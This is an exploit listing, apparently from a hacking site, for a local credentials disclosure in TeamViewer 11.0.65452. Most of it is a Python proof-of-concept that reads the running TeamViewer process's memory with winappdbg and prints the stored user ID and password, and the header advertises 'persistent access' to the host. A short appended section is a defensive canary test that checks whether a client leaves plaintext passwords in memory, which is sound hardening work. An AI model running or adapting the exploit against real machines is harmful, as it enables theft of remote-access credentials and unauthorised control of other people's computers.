ExtremeHacking
Filename: TeamViewer 11.0.65452 (64 bit) - Local Credentials Disclosure Exploit
Permission: rw-r--r--
Author: Unknown
Date and Time: 9/09/2016


Full title: TeamViewer 11.0.65452 (64 bit) - Local Credentials Disclosure Exploit
Date added: 08-09-2016
Category: local exploits
Platform: windows
Risk: Security Risk High


#####
# TeamViewer 11.0.65452 is vulnerable to local credentials disclosure: the supplied user ID and password are stored in plaintext in the process memory.
# No privileged account access is needed. The credentials are stored in the context of a regular user.
# A potential attacker could reveal the supplied username and password automatically and gain persistent access to the host via TeamViewer services.
#
# Proof-Of-Concept Code:
#####
  
from winappdbg import Debug, Process, HexDump
import sys
import re
  
filename = 'TeamViewer.exe'
  
def memory_search( pid ):
        found = []
        # Instance a Process object.
        process = Process( pid )
        # Search for the string in the process memory.
  
        # Looking for User ID:
        userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'
        for address in process.search_regexp( userid_pattern ):
                 found += [address]
          
        print 'Possible UserIDs found:'
        found = [i[-1] for i in found]
        for i in set(found):
           print i.replace('\x00','')
          
        found = []
        # Looking for Password:
        pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'
        for address in process.search_regexp( pass_pattern ):
                 found += [process.read(address[0]-3,16)]
        if found:
            print '\nPassword:'
        if len(found) > 1:
            s = list(set([x for x in found if found.count(x) > 1]))
            for i in s:
               pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0]
            print pwd
        else:
            print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]
          
        return found
  
debug = Debug()
try:
        # Lookup the currently running processes.
        debug.system.scan_processes()
        # For all processes that match the requested filename...
        for ( process, name ) in debug.system.find_processes_by_filename( filename ):
                pid = process.get_pid()
  
        memory_search(pid)
             
finally:
        debug.stop()
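
A defender-side regression check for the weakness described above, as an added example that is not part of the original PoC: plant a known canary password in a lab client, snapshot its memory, and count the plaintext copies in UTF-16LE (the layout the PoC's digit-plus-\x00 patterns imply) and UTF-8. The names CANARY, find_canary, audit and snapshot_after_login are hypothetical, and the snapshot is a constructed stand-in for a real process dump.

```python
import re

# Encodings in which a Windows GUI process commonly holds strings; the PoC's
# patterns (digit, \x00, digit, \x00, ...) correspond to UTF-16LE.
ENCODINGS = ("utf-16-le", "utf-8")


def find_canary(dump: bytes, canary: str):
    """Return sorted (offset, encoding) pairs for each plaintext copy of canary."""
    hits = []
    for enc in ENCODINGS:
        needle = re.escape(canary.encode(enc))
        hits += [(m.start(), enc) for m in re.finditer(needle, dump)]
    return sorted(hits)


def audit(dump: bytes, canary: str) -> dict:
    """Summarise the result in a form a regression test can assert on."""
    hits = find_canary(dump, canary)
    return {"leaked": bool(hits), "copies": len(hits),
            "encodings": sorted({enc for _, enc in hits})}


def snapshot_after_login(canary: str, wipe: bool) -> bytes:
    """Constructed stand-in for a client's memory after a login attempt."""
    secret = bytearray(canary.encode("utf-16-le"))  # buffer filled by the UI
    working = bytearray(secret)                     # copy made for authentication
    if wipe:  # hardened behaviour: overwrite every copy once it has been used
        for buf in (secret, working):
            buf[:] = bytes(len(buf))
    return b"\x00" * 16 + bytes(secret) + b"hdr" + bytes(working) + b"\xff" * 4


CANARY = "4821"  # constructed test password, entered only in a lab instance

if __name__ == "__main__":
    for wipe in (False, True):
        print("wipe=%s ->" % wipe, audit(snapshot_after_login(CANARY, wipe), CANARY))
```

To use the check on a real build, pass find_canary the bytes of a full memory dump taken from the test client after the canary has been entered; any hit means a plaintext copy outlived its use.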




 
